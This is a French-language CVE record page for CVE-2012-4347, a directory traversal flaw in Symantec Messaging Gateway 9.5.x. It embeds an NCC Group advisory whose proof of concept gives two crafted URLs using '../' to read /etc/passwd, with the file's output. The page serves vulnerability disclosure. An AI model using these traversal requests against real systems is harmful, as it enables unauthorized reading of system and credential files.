CVE-2012-4347
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Descriptions du CVE
Multiple directory traversal vulnerabilities in the management console in Symantec Messaging Gateway (SMG) 9.5.x allow remote authenticated users to read arbitrary files via a .. (dot dot) in the (1) logFile parameter in a logs action to brightmail/export or (2) localBackupFileSelection parameter in an APPLIANCE restoreSource action to brightmail/admin/restore/download.do.
Informations du CVE
Faiblesses connexes
| Nom de la faiblesse | Source | |
|---|---|---|
| Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. |
Métriques
| Métriques | Score | Gravité | CVSS Vecteur | Source |
|---|---|---|---|---|
| V2 | 5 | AV:N/AC:L/Au:N/C:P/I:N/A:N | nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 23110
Date de publication : 2012-12-02 23h00 +00:00
Auteur : Ben Williams
EDB Vérifié : No
=======
Summary
=======
Name: Symantec Messaging Gateway - Arbitrary file download is possible with a crafted URL (authenticated)
Release Date: 30 November 2012
Reference: NGS00266
Discoverer: Ben Williams <ben.williams@ngssecure.com>
Vendor: Symantec
Vendor Reference:
Systems Affected: Symantec Messaging Gateway 9.5.3-3
Risk: Medium
Status: Published
========
TimeLine
========
Discovered: 17 April 2012
Released: 17 April 2012
Approved: 29 April 2012
Reported: 30 April 2012
Fixed: 27 August 2012
Published: 30 November 2012
===========
Description
===========
I. VULNERABILITY
-------------------------
Symantec Messaging Gateway 9.5.3-3 - Arbitrary file download is possible with a crafted URL (authenticated)
II. BACKGROUND
-------------------------
Symantec Messaging Gateway 9.5.3-3 is the latest version, of their Email Security Appliance
III. DESCRIPTION
-------------------------
The vulnerability would enable an attacker (who has authenticated to the web interface) to download arbitrary files from the appliance with the permissions of the Webserver user
=================
Technical Details
=================
IV. PROOF OF CONCEPT
-------------------------
Various files containing sensitive information can be downloaded using a crafted URL for example:
http://192.168.1.59:41080/brightmail/export?type=logs&logFile=../../../etc/passwd&logType=1&browserType=1
Which produces a file containing:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
postfix:x:100:101::/home/postfix:/bin/bash
mailwall:x:500:501::/home/mailwall:/bin/bash
mysql:x:501:103::/home/mysql:/bin/bash
bcc:x:502:99::/home/bcc:/bin/bash
support:x:503:503::/home/support:/bin/bash
admin:x:504:501::/home/admin:/bin/rbash
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
Simliar issues can be seen in other places such as here:
http://192.168.1.59:41080/brightmail/admin/restore/download.do?no-cache=false&displayTab=restore&restoreSource=APPLIANCE&localBackupFileSelection=../../etc/passwd
===============
Fix Information
===============
An updated version of the software has been released to address the vulnerability:
http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120827_00
NCC Group Research
http://www.nccgroup.com/research
For more information please visit <a href="http://www.mimecast.com">http://www.mimecast.com<br>
This email message has been delivered safely and archived online by Mimecast.
</a>
Products Mentioned
Configuraton 0
Symantec>>Messaging_gateway >> Version 9.5
- Symantec>>Messaging_gateway >> Version 9.5 (Open CPE detail)
Symantec>>Messaging_gateway >> Version 9.5.1
- Symantec>>Messaging_gateway >> Version 9.5.1 (Open CPE detail)
Symantec>>Messaging_gateway >> Version 9.5.2
- Symantec>>Messaging_gateway >> Version 9.5.2 (Open CPE detail)
Symantec>>Messaging_gateway >> Version 9.5.3
- Symantec>>Messaging_gateway >> Version 9.5.3 (Open CPE detail)
Symantec>>Messaging_gateway >> Version 9.5.4
- Symantec>>Messaging_gateway >> Version 9.5.4 (Open CPE detail)
